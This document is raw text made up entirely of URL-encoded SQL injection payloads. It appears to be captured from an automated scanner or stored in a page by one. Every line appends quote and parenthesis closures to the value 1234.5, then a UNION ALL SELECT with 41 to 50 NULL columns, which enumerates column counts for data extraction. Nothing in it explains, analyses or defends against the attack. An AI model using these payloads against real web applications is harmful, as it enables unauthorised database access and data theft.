1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 